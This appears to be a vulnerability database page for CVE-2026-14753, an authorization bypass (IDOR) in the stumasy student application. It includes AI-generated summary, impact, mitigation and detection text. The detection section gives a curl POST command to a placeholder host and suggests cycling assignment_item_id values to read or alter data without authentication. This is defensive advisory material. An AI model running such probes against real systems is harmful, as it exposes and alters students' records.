CVE-2026-14753
Received Received - Intake

Authorization Bypass in Stumasy Note Handler via assignment_item_id

Vulnerability report for CVE-2026-14753, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-05

Last updated on: 2026-07-05

Assigner: VulDB

Description

A vulnerability was detected in mjperpinosa stumasy up to 327d1b0f2915ba79d7ef8ebb74553e987609d9be. This impacts an unknown function of the file /PHP/objects/notes of the component Note Handler/Assignment Handler. Performing a manipulation of the argument assignment_item_id results in authorization bypass. The attack can be initiated remotely. The exploit is now public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-07-05
Last Modified
2026-07-05
Generated
2026-07-05
AI Q&A
2026-07-05
EPSS Evaluated
N/A
NVD
EUVD

Affected Vendors & Products

Showing 1 associated CPE
Vendor Product Version / Range
mjperpinosa stumasy to 327d1b0f2915ba79d7ef8ebb74553e987609d9be (inc)

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-285 The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.
CWE-639 The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

CVE-2026-14753 is an Insecure Direct Object Reference (IDOR) vulnerability in the mjperpinosa stumasy application. It allows unauthenticated attackers to bypass authorization by manipulating the argument assignment_item_id in certain endpoints. These endpoints accept record IDs from POST data without verifying user authentication or ownership, enabling attackers to read and modify notes and assignment answers remotely.

The affected files include update_assignment_answer.php, retrieve_assignment_answer_to_update.php, update_scratch_data.php, retrieve_scratch_data_to_update.php, delete_scratch_data.php, and Notes_controller.php. The root cause is the lack of checks on active sessions or ownership tables, allowing attackers to guess numeric IDs and tamper with student data.

Impact Analysis

This vulnerability can impact you by compromising the confidentiality and integrity of student data within the stumasy application. An attacker can remotely read and modify notes and assignment answers without authentication, potentially leading to unauthorized data disclosure and data tampering.

Such unauthorized access and modification can undermine trust in the system, disrupt academic records, and cause harm to users relying on the accuracy and privacy of their data.

Detection Guidance

This vulnerability can be detected by testing the affected endpoints for authorization bypass issues. Specifically, you can attempt to access or modify notes and assignment answers by manipulating numeric IDs in POST requests without proper authentication or ownership verification.

Commands to detect this vulnerability would involve sending crafted HTTP POST requests to the vulnerable endpoints with different assignment_item_id or record IDs and observing if unauthorized access or modifications are possible.

  • Use curl or similar tools to send POST requests to endpoints such as update_assignment_answer.php, retrieve_assignment_answer_to_update.php, update_scratch_data.php, retrieve_scratch_data_to_update.php, delete_scratch_data.php, and Notes_controller.php.
  • Example curl command to test unauthorized access: curl -X POST -d "assignment_item_id=123" https://targetsite/PHP/objects/notes/update_assignment_answer.php -v
  • Try changing the assignment_item_id value to other numeric IDs to check if you can read or modify data without authentication.
Mitigation Strategies

Immediate mitigation steps include implementing proper authorization checks on all affected endpoints to verify user authentication and ownership of the requested records before allowing access or modification.

Restrict access to the vulnerable endpoints to authenticated users only and validate that the user owns the assignment or note they are trying to access or modify.

  • Add session validation and ownership verification logic in the code handling assignment_item_id and other record IDs.
  • Monitor logs for suspicious activity involving manipulation of numeric IDs in POST requests.
  • If possible, temporarily disable or restrict access to the vulnerable endpoints until a patch or update is available.
Compliance Impact

The vulnerability allows unauthenticated attackers to read and modify notes and assignment answers by exploiting insecure direct object references without verifying user authentication or ownership. This compromises the confidentiality and integrity of student data.

Such unauthorized access and modification of personal or sensitive data can lead to non-compliance with data protection regulations like GDPR and HIPAA, which require strict controls over access to personal information and maintaining data integrity.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-14753. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart